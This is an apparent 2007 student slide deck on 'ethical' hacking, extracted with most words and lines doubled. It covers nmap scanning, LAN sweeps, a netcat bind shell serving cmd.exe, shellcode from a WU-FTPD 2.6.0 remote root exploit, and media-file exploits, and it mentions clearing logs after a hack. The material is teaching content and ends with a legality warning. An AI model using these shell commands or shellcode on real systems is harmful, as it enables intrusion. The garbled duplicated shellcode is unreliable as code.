Security & Security & “Ethical” Hacking“Ethical” Hacking

Luke ArntsonLuke Arntson

Central Washington UniversityCentral Washington University

Winter 2007Winter 2007

Presentation #2 – Advanced Scanning & ExploitationPresentation #2 – Advanced Scanning & Exploitation

IntroductionIntroduction

Again “Again “EthicalEthical” hacking” hacking

Do youDo you Sniff Sniff before you taste?before you taste?

Patience, persistence, some other Patience, persistence, some other motivationalmotivational p word… p word…

Have phun, getting Have phun, getting frustratedfrustrated is normal is normal

About MeAbout Me

OverviewOverview Advanced Advanced scanningscanning with NMAP (as with NMAP (as

seen in the Matrix)seen in the Matrix) LocalLocal IP Sweeping & its importanceIP Sweeping & its importance Netcat Netcat rooting, a simple shellrooting, a simple shell Identify Identify StationStation ( operating system )( operating system ) Brief Brief ExploitExploit talk & talk & ShellShell code code ExploitsExploits via Jpgs, Pngs, Mp3s, etc. via Jpgs, Pngs, Mp3s, etc. ConclusionConclusion

Advanced Scanning (NMAP)Advanced Scanning (NMAP) Ok, we have acquired an Ok, we have acquired an IPIP (or range (or range

of) and we want to find out some of) and we want to find out some information about this information about this systemsystem..

We will use a very popular program We will use a very popular program named named NmapNmap..

Almost every Linux install its Almost every Linux install its packaged, packaged, WindowsWindows you will need to you will need to download Nmap and the download Nmap and the Win-PcapWin-Pcap files.files.

Advanced Scanning (NMAP)Advanced Scanning (NMAP) Lets look at some of the information Lets look at some of the information

techniquestechniques provided by nmap provided by nmap

SCAN TECHNIQUESSCAN TECHNIQUES:: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan-sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans-sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags--scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan-sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan-sO: IP protocol scan -b <ftp relay host>: FTP bounce scan-b <ftp relay host>: FTP bounce scan

We will be using We will be using another scan another scan techniquetechnique to to probeprobe open ports and open ports and determine determine service/versionsservice/versions in use: -sV in use: -sV

Advanced Scanning (NMAP)Advanced Scanning (NMAP) So lets run a -sV scan along with -v for verbose So lets run a -sV scan along with -v for verbose

and -O for OS detectionand -O for OS detection

Advanced Scanning (NMAP)Advanced Scanning (NMAP) So lots of gibberish, but we can sort So lots of gibberish, but we can sort

through this for through this for VERY importantVERY important details! details!

First: we have all of the First: we have all of the open portsopen ports, , along with what along with what versionsversions they are they are running! Port 139.. Very interesting.running! Port 139.. Very interesting.

Second: we also found out the Second: we also found out the operating systemoperating system! Windows 98 SE… ! Windows 98 SE… that will be later.that will be later.

Protection from NMAPProtection from NMAP Keep those Keep those firewallsfirewalls up if you’re not up if you’re not

a server and you’re not hosting.a server and you’re not hosting.

There is not much you can do.. and There is not much you can do.. and NMAP can be NMAP can be extremely stealthyextremely stealthy using using advanced techniques.advanced techniques.

It is scary It is scary how muchhow much information can information can be acquired about you by a be acquired about you by a simple simple sniffsniff and run. and run.

Local IP SweepingLocal IP Sweeping The The LANLAN is the is the weakestweakest network network

generallygenerally

Open Open portsports, open , open boxesboxes, free , free IPsIPs, , easy sweepseasy sweeps

Vast Vast majority majority of people feel other of people feel other computers within the LAN are computers within the LAN are not not hackershackers, but , but compromisecompromise a wireless a wireless router & bam…router & bam…

Using Angry IP Scanner Using Angry IP Scanner Again!Again!

Angry IP ScannerAngry IP Scanner; Its script kiddie, but it ; Its script kiddie, but it worksworks very well, and is very well, and is fasterfaster than NMAP than NMAP

Lets grab our Lets grab our local IPlocal IP on the network, and on the network, and begin our begin our scanscan, so we are currently , so we are currently 192.168.5.100, and we know our 192.168.5.100, and we know our rangerange is is 192.168.5.*192.168.5.*

Use Angry IP Scanner just to find Use Angry IP Scanner just to find availableavailable peers on the network, this is VERY useful peers on the network, this is VERY useful for a for a compromisedcompromised wireless router or wireless router or compromisedcompromised system on a router system on a router

We Have Local Victims!We Have Local Victims! Okay, we have Okay, we have locallocal victims, we can victims, we can

now use now use NmapNmap on on eacheach victim. victim.

Nmap will also Nmap will also bypass firewallsbypass firewalls given given enough enough time time with the –P0 option.with the –P0 option.

Once we know Once we know operating systemsoperating systems, , open open portsports, we can use online , we can use online security security search toolssearch tools such as such as www.securityfocus.comwww.securityfocus.com and locate and locate exploitsexploits! !

Importance of Local SweepsImportance of Local Sweeps

CompromisedCompromised routers = routers = compromised compromised systems, systems, vulnerablevulnerable on the inside only. on the inside only.

Apply a Apply a full controlfull control root kit to a root kit to a computer computer behindbehind a router, and you a router, and you have LAN access… hence have LAN access… hence local local IP IP sweepingsweeping

Viruses often Viruses often spreadspread within a network within a network (commercial, government, etc.) using (commercial, government, etc.) using LAN sweepsLAN sweeps

Netcat Rooting (Simple Netcat Rooting (Simple Shell)Shell)

Ok, we want to see what kind of Ok, we want to see what kind of accessaccess a a shell really has on a system.shell really has on a system. ShellShell referring to a command prompt window on referring to a command prompt window on

another computer.another computer.

NetcatNetcat is a very useful UDP/TCP is a very useful UDP/TCP rawraw client/server that can also double as a nice client/server that can also double as a nice shell. shell.

A windows version isA windows version is free free to download, Linux to download, Linux generally comes with NC in the shell already.generally comes with NC in the shell already.

Client/ServerClient/Server Determine Determine which which computer you want to have computer you want to have

a a shellshell on, and put nc.exe on, and put nc.exe somewheresomewhere on on there.there.

Next Next runrun nc.exe with the following nc.exe with the following parameters: parameters: nc.exe –l –p 666 –e “cmd.exe”nc.exe –l –p 666 –e “cmd.exe”

This will This will executeexecute Netcat to Netcat to listenlisten on port 666, on port 666, and when and when connectedconnected, it will , it will executeexecute and send and send the output of the output of cmd.execmd.exe on the server. on the server.

Client ConnectionClient Connection

Client now Client now connectsconnects to the to the serverserver using the corresponding line: using the corresponding line:

nc.exe 192.168.77.2 666nc.exe 192.168.77.2 666

And Viola! Netcat And Viola! Netcat shellshell over the over the network.network.

Why Netcat Root?Why Netcat Root? A nice way to make your A nice way to make your first rootfirst root, , easyeasy to to

expand on this.expand on this.

Potential is Potential is HUGEHUGE when the –e “???” when the –e “???” command is used.command is used.

Netcat is Netcat is open sourceopen source, so you can venture , so you can venture the the source codesource code to understand how to understand how exactly Netcat does this.exactly Netcat does this.

This also works in Unix, just replace This also works in Unix, just replace cmd.exe with a cmd.exe with a UnixUnix shell ;) shell ;)

Identify StationIdentify Station

ContinuationContinuation of Nmap OS discovery of Nmap OS discovery

Once we have found a target, what kind Once we have found a target, what kind of of operating systemoperating system is it running? is it running?

Nmap Nmap -O-O command will usually show command will usually show you, unless the computer has a firewall you, unless the computer has a firewall on.on.

Importance of OS IDImportance of OS ID ExploitingExploiting and and choicechoice of exploits/roots is of exploits/roots is

always always dependentdependent on the type of OS on the type of OS

Do we want to look for Do we want to look for likely exploitslikely exploits, find , find a a more aggressivemore aggressive approach, or leave it. approach, or leave it. For example, For example, Linux serversLinux servers often have a SSH often have a SSH

server open, we can either nmap –sV and server open, we can either nmap –sV and exploit, or try to bruteforce.exploit, or try to bruteforce.

Need to know what we are trying to hack, Need to know what we are trying to hack, especially when cleaning up after a especially when cleaning up after a successful hack (log files, email reports of successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)floods / bruteforce, rootkits, etc.)

Brief Exploits & Shell CodeBrief Exploits & Shell Code ExploitsExploits come in all sorts of come in all sorts of languageslanguages & &

sizessizes. Some are . Some are simplesimple run once on an run once on an IP, others have various IP, others have various optionsoptions and and offsetsoffsets..

ExploitsExploits are used as a way of getting are used as a way of getting intointo a system, shell code is what a system, shell code is what happens happens AFTERAFTER the exploit is the exploit is successfulsuccessful..

Shell code will always vary with Shell code will always vary with experienced hackers, as they will always experienced hackers, as they will always have useful shells on hand.have useful shells on hand.

Example Shellcode used by Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT WUFTPD 2.6.0 REMOTE ROOT

EXPLOITEXPLOIT char linuxcode[]= /* Lam3rZ chroot() code */ "\x31\xc0\x31\xdb\x31\xc9\char linuxcode[]= /* Lam3rZ chroot() code */ "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

This is This is machinemachine codecode, used to give specific , used to give specific callscalls in in Linux that will call chroot() and give the hacker a Linux that will call chroot() and give the hacker a shellshell on the vulnerable system. on the vulnerable system.

This is This is publicpublic knowledge, just type the following in knowledge, just type the following in Google:Google:

wuftpd exploit filetype:cwuftpd exploit filetype:c

More on Shells LaterMore on Shells Later

CreatingCreating shells is an entirely shells is an entirely differentdifferent topic, and we will go into how they actually topic, and we will go into how they actually figure out which figure out which machine codemachine code to use and to use and where to inject this in a later presentation.where to inject this in a later presentation.

Shells are Shells are scaryscary to to look atlook at because if you because if you do not know the machine code or the do not know the machine code or the system its intended for, there is system its intended for, there is absolutelyabsolutely no way to know what its doing, but it can no way to know what its doing, but it can compromisecompromise a system! a system!

Exploits via Jpg, Pngs, Mp3sExploits via Jpg, Pngs, Mp3s

Exploits come in Exploits come in many varietiesmany varieties, as it , as it just takes a just takes a stray string callstray string call or a or a bad bad sizesize checkcheck to make a program to make a program vulnerable.vulnerable.

All sorts of All sorts of formatsformats have been have been vulnerable, for example the famous vulnerable, for example the famous GDI+ Jpg vulnerability that would GDI+ Jpg vulnerability that would execute code just by viewing a jpg!execute code just by viewing a jpg!

GDI+ Jpg vulnerabilityGDI+ Jpg vulnerabilityPosted on Sept. 30, 2004Posted on Sept. 30, 2004 ““In the exploit attempts against AIM users, intruders In the exploit attempts against AIM users, intruders

post a copy of an infected JPEG image to their user post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM profile and then send instant messages to other AIM users enticing them to view that profile. When users enticing them to view that profile. When someone views such a profile and the JPEG image someone views such a profile and the JPEG image loads the viewing user's computer is then infected. loads the viewing user's computer is then infected.

Still other exploits have been discovered. According Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers appears to have spread to more than 50 computers at the time of this writing. “ – at the time of this writing. “ – Mark Joseph Edwards Mark Joseph Edwards

http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1

Exploits via Jpg, Pngs, Mp3sExploits via Jpg, Pngs, Mp3s Other Other vulnerabilitiesvulnerabilities in the in the formform of of

Pngs and Mp3s have come into the Pngs and Mp3s have come into the wild.wild.

One Mp3 would use the One Mp3 would use the headerheader to to execute a execute a shellshell in Winamp when the in Winamp when the meta-datameta-data was loaded. was loaded.

A Png exploit in MSN Messenger would A Png exploit in MSN Messenger would allow hackers to put allow hackers to put shellcodeshellcode in a Png in a Png and and displaydisplay it as a buddy icon to other it as a buddy icon to other users.users.

Just because its media…Just because its media…

Just because you’re Just because you’re viewingviewing a jpg, a jpg, png, mp3, wmv, you could still be png, mp3, wmv, you could still be runningrunning something that exploits your something that exploits your computer.computer.

Many people think Many people think exploitsexploits come in come in very very limited formslimited forms of scripts, tcp/udp of scripts, tcp/udp injections or executables, but there injections or executables, but there are are manymany ways in. ways in.

ResourcesResources If this type of information interests you, If this type of information interests you,

there are many there are many safesafe online resources. online resources.

www.hackthissite.orgwww.hackthissite.org - a friendly - a friendly playground for web hackersplayground for web hackers

www.phrack.orgwww.phrack.org - a very good place for - a very good place for random articles with great pieces of inforandom articles with great pieces of info

www.securityfocus.comwww.securityfocus.com - some of the best - some of the best up-to-date info about vulnerabilities and up-to-date info about vulnerabilities and exploits.exploits.

ConclusionConclusion Again, I Again, I emphasizeemphasize just because I’m just because I’m showingshowing

you this, does you this, does NOTNOT make it legal. make it legal. In fact, scanning In fact, scanning governmentgovernment systems with NMAP systems with NMAP

and getting caught can land you with fines & and getting caught can land you with fines & possible jail time. Running exploits with shellcode possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not test system to a wild virus or backdoor you do not know about.know about.

Remember, Remember, findingfinding exploits that exploits that workwork is is tedious, tedious, not everythingnot everything you find online works you find online works every timeevery time. Setup a . Setup a fun boxfun box (something like (something like Mandrake) and install some Mandrake) and install some vulnerablevulnerable software on there. See if you can break into it. software on there. See if you can break into it. Ex. Wuftpd 2.60. Ex. Wuftpd 2.60. Have funHave fun, it takes work so , it takes work so don’t give up!don’t give up!

Thank You For Your Time!Thank You For Your Time!

Feel free to email me any Feel free to email me any questions/comments at questions/comments at

arntsonl@cwu.eduarntsonl@cwu.edu